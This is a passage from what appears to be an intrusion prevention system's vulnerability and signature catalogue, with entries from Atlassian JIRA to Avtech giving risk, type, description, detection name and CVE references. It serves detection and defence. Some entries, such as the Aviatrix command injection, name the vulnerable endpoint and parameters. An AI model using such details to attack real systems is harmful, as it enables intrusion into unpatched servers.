Back to top

Atlassian-JIRA-And-Service-Management-Ehcache-Rmi-Insecure-Deserialization

About this vulnerability: A vulnerability in Atlassian JIRA and Service Management.
Risk: High
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Platform: Generic
Software: Atlassian JIRA
Type: Input Validation
Description: A vulnerability in Atlassian JIRA and Service Management, multiple versions, which allows remote attackers to execute arbitrary code by sending maliciously crafted serialized parameters to the target application via an RMI call, due to lack of input validation.
Situation: Generic_CS-Atlassian-JIRA-And-Service-Management-Ehcache-Rmi-Insecure-Deserialization
References:
CVE-2020-36239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36239
Back to top

Atlassian-JIRA-Email-Templates-Server-Side-Template-Injection

About this vulnerability: A vulnerability in Atlassian JIRA
Risk: High
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Generic
Software: Atlassian JIRA
Type: Input Validation
Description: A server-side template injection vulnerability has been reported for Atlassian Jira Server and Date Center. This vulnerability is due to insufficient blacklist of allowed classes available to the Velocity template engine. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution.
Situation: File-Text_Atlassian-JIRA-Email-Templates-Server-Side-Template-Injection
References:
CVE-2022-36799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36799
Back to top

Atlassian-JIRA-Issue-Collector-Directory-Traversal

About this vulnerability: A vulnerability in Atlassian JIRA
Risk: High
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Atlassian JIRA
Type: Input Validation
Description: A directory traversal vulnerability exists in Atlassian JIRA. The vulnerability is due to lack of input validation when processing user supplied data. A remote unauthorized user can attack the service by sending crafted HTTP requests. Successful exploitation could lead to command injection and execution in security context of the JIRA service, which is SYSTEM by default.
Situation: HTTP_CS-Atlassian-JIRA-Issue-Collector-Directory-Traversal
References:
CVE-2014-2314
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2314
BID-65849
http://www.securityfocus.com/bid/65849
OSVDB-103807
http://www.osvdb.org/103807
Back to top

Atlassian-JIRA-Server-And-Data-Center-Issue-Collector-Reflected-XSS

About this vulnerability: A vulnerability in Atlassian JIRA
Risk: Moderate
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Platform: Generic
Software: Atlassian JIRA
Type: Input Validation
Description: Improper validation of error messages causes a reflected cross-site scripting vulnerability in Atlassian JIRA. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Atlassian-JIRA-Server-And-Data-Center-Issue-Collector-Reflected-Cross-Site-Scripting
References:
CVE-2021-43942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43942
Back to top

Atlassian-JIRA-Server-And-Data-Center-Limited-File-Read-CVE-2021-26086

About this vulnerability: A vulnerability in Atlassian JIRA
Risk: High
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Platform: Generic
Software: Atlassian JIRA
Type: Directory Traversal
Description: A path traversal vulnerability in Atlassian Jira Server and Data Center allows unauthenticated read access to a specific set of configuration files.
Situation: HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Limited-File-Read-CVE-2021-26086
References:
CVE-2021-26086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26086
Back to top

Atlassian-JIRA-Server-And-Data-Center-Mobile-Plugin-Server-Side-Request-Forgery

About this vulnerability: A vulnerability in Atlassian JIRA
Risk: Moderate
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Platform: Generic
Software: Atlassian JIRA
Type: Input Validation
Description: Improper input validation causes a server-side request forgery vulnerability in Atlassian Jira. A successful exploit allows an attacker to access information on the target.
Situation: HTTP_CRL-Atlassian-JIRA-Server-And-Data-Center-Mobile-Plugin-Server-Side-Request-Forgery
References:
CVE-2022-26135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26135
Back to top

Atlassian-JIRA-Server-And-Data-Center-Planurl-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Atlassian JIRA
Risk: Moderate
First detected in: sgpkg-ips-1498-5242
Last changed: sgpkg-ips-1498-5242
Platform: Generic
Software: Atlassian JIRA
Type: Input Validation
Description: Insufficient sanitization of the planUrl parameter in HTTP requests to the TeamManagement.jspa endpoint causes a cross-site scripting vulnerability in Atlassian Jira. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Planurl-Reflected-Cross-Site-Scripting
References:
CVE-2022-36801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36801
Back to top

Atlassian-JIRA-Server-And-Data-Center-Viewuserhover.jspa-Information-Disclosure

About this vulnerability: A vulnerability in Atlassian JIRA
Risk: High
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1300-5242
Platform: Generic
Software: Atlassian JIRA
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Atlassian Jira Server and Data Center. The vulnerability is due to insufficient validation of permissions in the ViewUserHover action. An unauthenticated, remote attacker can exploit this vulnerability by sending a specific request to the target server. A successful attack discloses the existence of usernames on the Jira instance.
Situation: HTTP_CSU-Atlassian-JIRA-Server-And-Data-Center-Viewuserhover.jspa-Information-Disclosure
References:
CVE-2020-14181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14181
Back to top

Atlassian-JIRA-Template-Injection-CVE-2019-11581

About this vulnerability: A vulnerability in Atlassian JIRA
Risk: Moderate
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Atlassian JIRA
Type: Input Validation
Description: Improper validation of form input causes a template injection vulnerability in Atlassian JIRA. A successful exploit allows an attacker to execute arbitrery code with the privileges of the service.
Situation: HTTP_CS-Atlassian-JIRA-Template-Injection-CVE-2019-11581
References:
CVE-2019-11581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11581
Back to top

Atlassian-Remote-File-Access

About this vulnerability: An Atlassian Remote File Access vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Atlassian
Type: Insecure Configuration
Description: A vulnerability in various versions of Atlassian products which allows remote attackers to read remote files from the server due to the way Atlassian handles XML files, specifically with the expansion of external entities with the SYSTEM identifier.
Situation: HTTP_CRL-Atlassian-Remote-File-Access
References:
CVE-2012-2926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2926
BID-53595
http://www.securityfocus.com/bid/53595
OSVDB-82274
http://www.osvdb.org/82274
Back to top

Atmosphere-Framework-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Atmosphere Framework
Risk: Moderate
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Platform: Generic
Software: Atmosphere Framework
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported in the Atmosphere framework. Successful exploitation of this vulnerability could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-Atmosphere-Framework-Reflected-Cross-Site-Scripting
Back to top

Atrium-Software-Mercur-IMAPD-Subscribe-Command-Buffer-Overflow

About this vulnerability: A stack-based buffer overflow vulnerability in Atrium Software MERCUR IMAP service.
Risk: High
First detected in: sgpkg-ips-275-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mercur Messaging
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Atrium Software MERCUR IMAP service. A remote unauthenticated attacker can exploit this vulnerability by sending specially crafted data with the SUBSCRIBE command.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Subscribe-Command
References:
CVE-2007-1579
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1579
BID-23050
http://www.securityfocus.com/bid/23050
OSVDB-33546
http://www.osvdb.org/33546
Back to top

ATT-WinVNC-Client-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in ATT WinVNC Client.
Risk: High
First detected in: sgpkg-ips-662-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: VNC
Type: Buffer Overflow
Description: A buffer overflow vulnerability in ATT WinVNC client 3.3.3r7 and earlier which allows remote attackers to execute arbitrary commands via a long rfbConnFailed packet with a long reason string.
Situation: Generic_SS-ATT-WinVNC-Client-Buffer-Overflow
References:
CVE-2001-0167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0167
BID-2305
http://www.securityfocus.com/bid/2305
OSVDB-6281
http://www.osvdb.org/6281
Back to top

Attachmate-Reflection-FTP-Client-ActiveX-Getglobalsettings-Memory-Corruption

About this vulnerability: A vulnerability in Attachmate INFOConnect Enterprise
Risk: Moderate
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Attachmate INFOConnect Enterprise; Attachmate Reflection FTP Client
Type: Malfunction
Description: A memory corruption vulnerability has been found in Attachmate Reflection FTP Client. The vulnerability is due to an attempt to dereference user-controllable parameter input. A remote, unauthenticated attacker could exploit this vulnerability by enticing a user to visit a malicious page. Successful exploitation could lead to arbitrary code execution under the security context of the browser.
Situation: File-Text_Attachmate-Reflection-FTP-Client-ActiveX-Getglobalsettings-Memory-Corruption
References:
CVE-2014-0603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0603
OSVDB-109761
http://www.osvdb.org/109761
Back to top

Attachmate-Reflection-FTP-Client-Pwd-Command-Buffer-Overflow

About this vulnerability: A vulnerability in Attachmate Reflection FTP Client
Risk: Moderate
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Attachmate Reflection FTP Client
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in Attachmate Reflection FTP Client. The vulnerability is caused by insufficient boundary checking while processing PWD command responses. An attacker could exploit this vulnerability by enticing a user to access an FTP server that sends specially crafted PWD command responses. Successful exploitation could lead to arbitrary code execution under the security context of the currently logged on user.
Situation: FTP_SS-Attachmate-Reflection-FTP-Client-Pwd-Command-Buffer-Overflow
References:
CVE-2014-5211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5211
OSVDB-117419
http://www.osvdb.org/117419
Back to top

ATutor-Directory-Traversal-RCE

About this vulnerability: A vulnerability in ATutor
Risk: High
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1354-5242
Platform: Linux; Windows
Software: ATutor
Type: Input Validation
Description: There exists a vulnerability in ATutor, versions 2.2.4, 2.2.2 and 2.2.1, which allows remote attackers to execute arbitrary code via a directory traversal flaw within language_import.php.
Situation: File-Member-Name_ATutor-Directory-Traversal-RCE
References:
CVE-2019-12169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12169
Back to top

ATutor-SQL-Injection

About this vulnerability: An ATutor SQL Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ATutor
Type: SQL Injection
Description: A vulnerability in ATutor, version 2.2.1, which allows remote attackers to bypass authentication and upload malicious code.
Situation: HTTP_CRL-ATutor-SQL-Injection
References:
CVE-2016-2555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2555
Back to top

Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in Aurigma Image Uploader
Risk: Moderate
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Aurigma Image Uploader
Type: Resource Starvation
Description: There is a buffer exhaustion vulnerability in the Aurigma Image Uploader ActiveX control. The flaw is due to a boundary error when processing excessively long parameters passed to the control. A remote attacker can exploit this vulnerability by persuading the target user to open a malicious web page. Successful exploitation may create a denial of service condition in the affected process.
Situation: HTTP_SS-Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service
File-Text_Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service
Back to top

Aurigma-Image-Uploader-Buffer-Overflow

About this vulnerability: A vulnerability in Aurigma Image Uploader ActiveX control
Risk: High
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Myspace Uploader; Aurigma Image Uploader
Type: Buffer Overflow
Description: There is a function deference vulnerability in SuperBuddy ActiveX control distributed in American Online (AOL) client software. The vulnerability is caused by an insufficient input validation when user controlled input is processed by the ActiveX control. Successful exploitation leads arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Aurigma-Image-Uploader-Buffer-Overflow
File-Text_Aurigma-Image-Uploader-Buffer-Overflow
References:
CVE-2008-0659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0659
BID-27533
http://www.securityfocus.com/bid/27533
Back to top

Authentium_Command_AntiVirus_odapi.dll_Multiple_Buffer_Overflows

About this vulnerability: Buffer overflow vulnerabilities in Authentium Command Antivirus
Risk: High
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-1408-5242
Platform: Windows
Software: Authentium Command Antivirus
Type: Buffer Overflow
Description: There are multiple buffer overflow vulnerabilities in Authentium Command Antivirus. The vulnerability is in the odapi.dll ActiveX component included in the product.
References:
CVE-2007-2917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2917
BID-24255
http://www.securityfocus.com/bid/24255
OSVDB-36801
http://www.osvdb.org/36801
Back to top

Autodesk-Autocad-Insecure-FAS-Loading

About this vulnerability: A vulnerability in Autodesk AutoCAD
Risk: High
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Autodesk AutoCAD
Type: Input Validation
Description: A code execution vulnerability has been reported in AutoCAD. The vulnerability is due to using improper search path when loading FAS files. A remote attacker could exploit this vulnerability by enticing a user to process an FAS file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application.
Situation: HTTP_CSU-Autodesk-Autocad-Request-To-Acad.FAS
HTTP_CSU-Autodesk-Autocad-Request-To-DWG-File
SMB-TCP_CHS-Autodesk-Autocad-Request-To-Acad.FAS
SMB-TCP_CHS-Autodesk-Autocad-Request-To-DWG-File
References:
CVE-2014-0818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0818
OSVDB-103585
http://www.osvdb.org/103585
Back to top

Autodesk-Autocad-Insecure-Library-Loading

About this vulnerability: A vulnerability in Autodesk AutoCAD
Risk: High
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Autodesk AutoCAD
Type: Input Validation
Description: An insecure library loading vulnerability has been reported in AutoCAD. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to process an AutoCAD file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application.
Situation: HTTP_CSU-Autodesk-Autocad-Request-To-Acdimres.dll
SMB-TCP_CHS-Autodesk-Autocad-Request-To-Acdimres.dll
References:
CVE-2014-0819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0819
OSVDB-103584
http://www.osvdb.org/103584
Back to top

Autodesk-IDrop-ActiveX-Control-ControlFile-Buffer-Overflow

About this vulnerability: A vulnerability in Autodesk i-drop ActiveX Control
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Autodesk i-drop
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Autodesk i-drop ActiveX control. The vulnerability is due to a lack of input validation when handling arguments of various methods. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows for arbitrary code injection and execution with the privileges of the currently logged in user.
Situation: HTTP_SS-Autodesk-IDrop-ActiveX-Control-Control-Buffer-Overflow
File-Text_Autodesk-IDrop-ActiveX-Control-Control-Buffer-Overflow
References:
BID-34352
http://www.securityfocus.com/bid/34352
OSVDB-53265
http://www.osvdb.org/53265
Back to top

Autodesk-Liveupdate-ActiveX-Control-Code-Execution

About this vulnerability: A vulnerability in ActiveX control of Autodesk Liveupdate
Risk: High
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Autodesk Revit Architecture; Autodesk Design Review
Type: Input Validation
Description: There is a code execution vulnerability in the Autodesk LiveUpdate ActiveX Control shipped with multiple products. The vulnerability is due to a lack of sanitation while handling parameters passed to the ApplyPatch method. A remote attacker could exploit the vulnerability by enticing the target user to open a malicious HTML document. Successful exploitation causes arbitrary command execution in the security context of the currently logged on user.
Situation: HTTP_SS-Autodesk-Liveupdate-ActiveX-Control-Code-Execution
File-Text_Autodesk-Liveupdate-ActiveX-Control-Code-Execution
References:
BID-31490
http://www.securityfocus.com/bid/31490
Back to top

AutoIt-Compiled-Program-Traffic

About this vulnerability: AutoIt compiled program traffic was detected
Risk: Moderate
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: AutoIt is a programming language for Microsoft Windows. In addition to legitimate purposes like automation, it is also used by malware writers to create malicious software.
Situation: HTTP_CRH-AutoIt-Compiled-Program-Traffic
Back to top

Automated-Solutions-Modbus_DoS

About this vulnerability: A vulnerability in Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC
Risk: High
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows;Linux
Software: Modbus SCADA
Type: Malfunction
Description: A vulnerability exists in Automated Solutions Modbus, Remote Heap Corruption, which allows for a DoS attack.
Situation: Generic_SS-Automated-Solutions-Modbus_DoS
Back to top

Automattic-Woocommerce-Blocks-Wordpress-Plugin-Store-API-SQL-Injection

About this vulnerability: A vulnerability in Automattic WooCommerce Blocks feature plugin
Risk: Moderate
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Platform: Generic
Software: Automattic WooCommerce
Type: Input Validation
Description: An SQL injection vulnerability has been reported in the WooCommerce Blocks feature WordPress plugin. Successful exploitation could lead in information disclosure.
Situation: HTTP_CSU-Automattic-Woocommerce-Blocks-Wordpress-Plugin-Store-API-SQL-Injection
References:
CVE-2021-32789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32789
Back to top

Autonomy-Connected-Backup-Type-13-Command-Injection

About this vulnerability: A vulnerability in Autonomy Connected Backup
Risk: Moderate
First detected in: sgpkg-ips-430-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Autonomy Connected Backup
Type: Input Validation
Description: A code execution vulnerability has been reported in Autonomy Connected Backup. The vulnerability is due to insufficient validation of commands contained in "Type 13" messages. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted Type 13 command to an affected system.
Situation: Generic_CS-Autonomy-Connected-Backup-Type-13-Command-Injection
References:
CVE-2011-2397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2397
OSVDB-77495
http://www.osvdb.org/77495
Back to top

Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in IBM Lotus Notes
Risk: High
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Lotus Notes; Autonomy KeyView IDOL Viewing SDK
Type: Integer Overflow
Description: There is an integer overflow vulnerability in the Autonomy KeyView Viewing SDK. The vulnerability is due to an error when parsing a Shared String Table (SST) record inside of an Excel file. A remote attacker could exploit this vulnerability by enticing the target user to open or view a malicious Excel file with the vulnerable version of the product. Successful exploitation results in execution of arbitrary code in the security context of the currently logged-in user. An unsuccessful attempt terminates the affected application abnormally.
Situation: E-Mail_BS-Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
HTTP_SS-Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
File-OLE_Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
References:
BID-36042
http://www.securityfocus.com/bid/36042
Back to top

Avast!-AntiVirus-ACE-File-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in ALWIL Software Avast! AntiVirus
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Avast Antivirus
Type: Malfunction
Description: There exists a stack-based buffer overflow vulnerability in avast! antivirus. The vulnerability is a result of improper boundary checking when scanning ACE files. An attacker can exploit this vulnerability to inject and execute arbitrary code. Any code injected will be executed with the privileges of the antivirus service, normally System. In a simple attack case aimed at creating a denial of service condition, only the affected thread will terminate. The vulnerable program as a whole will still function normally. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the affected process, normally System.
Situation: File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow
File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow-2
References:
CVE-2005-2385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2385
BID-14342
http://www.securityfocus.com/bid/14342
Back to top

Avast-AntiVirus-Engine-Remote-Lha-Buffer-Overflow

About this vulnerability: A vulnerability in ALWIL Software Avast! Antivirus
Risk: Moderate
First detected in: sgpkg-ips-368-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Avast Antivirus
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the Avast! Antivirus product line. The flaw exists due to insufficient verification of file and directory names in LHA archives. An attacker may leverage this vulnerability to disable the virus scanning service on the target host, or to inject and execute arbitrary code within the security context of the virus scanning process. Upon receiving a simple attack, the thread of the vulnerable product will crash when it try to scan the malicious LHA archive. This may create a denial of service condition to the antivirus protection provided by the affected product, allowing other malicious content being delivered to and from the target host. In an improbable case where code injection is successful, the flow of the process is diverted to the injected code and the attacker may execute arbitrary code on the target system. In such a case, the behaviour of the target host is dependent on the intention of the injected code. Any code executed will be within the privileges of the current service process, which is System by default.
Situation: HTTP_SS-Avast-AntiVirus-Engine-Lha-Buffer-Overflow
File-Binary_Avast-AntiVirus-Engine-Lha-Buffer-Overflow
Back to top

Avast-AntiVirus-X.509-Certificate-Common-Name-Remote-Command-Execution

About this vulnerability: A vulnerability in AVAST Software Antivirus
Risk: High
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Avast Antivirus
Type: Input Validation
Description: There exists a remote command execution vulnerability in Avast Antivirus. A bad server can deliver a malicious certificate which triggers the vulnerability resulting in arbitrary command execution.
Situation: HTTPS_SS-Avast-AntiVirus-X.509-Certificate-Common-Name-Remote-Command-Execution
Back to top

Avaya-IP-Office-Customer-Call-Reporter-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Avaya IP Office Customer Call Reporter
Risk: High
First detected in: sgpkg-ips-496-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Avaya IP Office Customer Call Reporter
Type: Input Validation
Description: A vulnerability has been reported in Avaya's IP Office Customer Call Reporter. The vulnerability is due to the ImageUpload.ashx page failing to restrict the content uploaded to a server. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted web request by way of the ImageUpload.ashx resource. A successful exploitation attempt could result in the execution of arbitrary code in the security context of the web server.
Situation: HTTP_CRL-Avaya-IP-Office-Customer-Call-Reporter-Unrestricted-File-Upload
References:
CVE-2012-3811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3811
BID-54225
http://www.securityfocus.com/bid/54225
OSVDB-83399
http://www.osvdb.org/83399
Back to top

Avaya-Winpdm-Unite-Host-Router-Service-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Avaya Windows Portable Device Manager
Risk: Moderate
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Avaya Windows Portable Device Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Avaya Windows Portable Device Manager which is an application used to configure Avaya IP DECT phones. The vulnerability is due to a boundary error when the Unite Host Router Service processes UTP requests. An attacker can exploit this vulnerability by sending specially crafted requests to the affected application. Successful exploitation could result in arbitrary code execution in the context of the affected service.
Situation: Generic_UDP-Avaya-Winpdm-Unite-Host-Router-Service-Stack-Buffer-Overflow
References:
BID-47947
http://www.securityfocus.com/bid/47947
OSVDB-73269
http://www.osvdb.org/73269
Back to top

AveMaria-Stealer-C2-Traffic

About this vulnerability: Avemaria Stealer C2 Traffic was detected
Risk: High
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: AveMaria is a stealer capable to collect credentials from the infected system.
Situation: Generic_CS-AveMaria-Stealer-C2-Traffic
Back to top

AVI-DirectX-DirectShow-AVI-Strn-BOF

About this vulnerability: Buffer overflow vulnerability DirectX DirectShow AVI handling
Risk: High
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DirectX
Type: Buffer Overflow
Description: DirectX DirectShow parses incorrectly AVI files with a malformed STRN chunk. A STRN chunk in an AVI contains a null-terminated string describing the file and the length of the string. DirectShow checks that the string is null-terminated and overwrites the strings last byte with null if it is not. The string length is not validated before overwriting, allowing a malicious AVI file to write a null-byte into an arbitrary memory location.
Situation: HTTP_AVI-DirectX-DirectShow-AVI-Strn-BOF
File-RIFF_Microsoft-Windows-AVI-DirectX-DirectShow-AVI-Strn-Buffer-Overflow
References:
CVE-2005-2128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2128
BID-15063
http://www.securityfocus.com/bid/15063
OSVDB-18822
http://www.osvdb.org/18822
MS05-050
http://technet.microsoft.com/security/bulletin/MS05-050
Back to top

Aviatrix-Controller-Command-Injection-CVE-2024-50603

About this vulnerability: An attempt to exploit a vulnerability in Aviatrix Controller detected
Risk: High
First detected in: sgpkg-ips-1825-5242
Last changed: sgpkg-ips-1825-5242
Platform: Generic
Software: Aviatrix Controller
Type: Input Validation
Description: An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to "/v1/api" in "cloud_type" parameter for "list_flightpath_destination_instances" action, or "src_cloud_type" parameter for "flightpath_connection_test" action.
Situation: HTTP_CRL-Aviatrix-Controller-Command-Injection-CVE-2024-50603
References:
CVE-2024-50603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50603
Back to top

Aviatrix-Controller-File-Upload-CVE-2021-40870

About this vulnerability: An attempt to exploit a vulnerability in Aviatrix Controller
Risk: Moderate
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1428-5242
Platform: Generic
Software: Aviatrix Controller
Type: Malfunction
Description: A file upload vulnerability in Aviatrix Controller
Situation: HTTP_CRL-Aviatrix-Controller-File-Upload-CVE-2021-40870
References:
CVE-2021-40870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40870
Back to top

Avid-Media-Composer-Stack-Based-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in Avid Media Composer detected
Risk: High
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Avid Media Composer
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Avid Media Composer 5.5.3 and before, within AvidPhoneticIndexer.exe, which allows remote attackers to execute arbitrary code via a long request.
Situation: Generic_CS-Avid-Media-Composer-Stack-Based-Buffer-Overflow
References:
CVE-2011-5003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5003
BID-50843
http://www.securityfocus.com/bid/50843
OSVDB-77376
http://www.osvdb.org/77376
Back to top

Avideo-WWBNIndex-Plugin-Unauthenticated-RCE

About this vulnerability: An attempt to exploit a vulnerability in WWBN AVideo detected
Risk: High
First detected in: sgpkg-ips-1732-5242
Last changed: sgpkg-ips-1732-5242
Platform: Windows; Unix
Software: WWBN AVideo
Type: Input Validation
Description: A vulnerability in the WWBNIndex plugin of the AVideo platform which allows remote attackers to execute arbitrary code though submitIndex.php due to insufficient input validation.
Situation: HTTP_CRL-Avideo-WWBNIndex-Plugin-Unauthenticated-RCE
References:
CVE-2024-31819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31819
Back to top

Aviosys-IP-POWER-9258-W2-Information-Disclosure

About this vulnerability: A vulnerability in Aviosys IP POWER 9258 W2
Risk: High
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IP POWER 9258 W2
Type: Input Validation
Description: A vulnerability in some versions of Aviosys IP POWER 9258 W2 could lead to information disclosure.
Situation: File-Text_Aviosys-IP-POWER-9258-W2-Information-Disclosure
Back to top

Avira-Management-Console-Server-HTTP-Header-Processing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in AVIRA Management Console Server
Risk: High
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Avira Management Console
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability has been reported in Avira Management Console Server. The vulnerability exists in the way Update Manager Service handles overly long HTTP headers. A remote unauthenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the server. Successful exploitation could lead to arbitrary code execution in the security context of System.
Situation: HTTP_Client-Header-Name-Too-Long
HTTP_Client-Header-Name-Too-Long
Back to top

Avtech-IP-Camera-AVM1203-Command-Injection-CVE-2024-7029

About this vulnerability: A vulnerability in AVTECH IP camera AVM1203
Risk: High
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Platform: Generic
Software: AVTECH IP camera AVM1203
Type: Input Validation
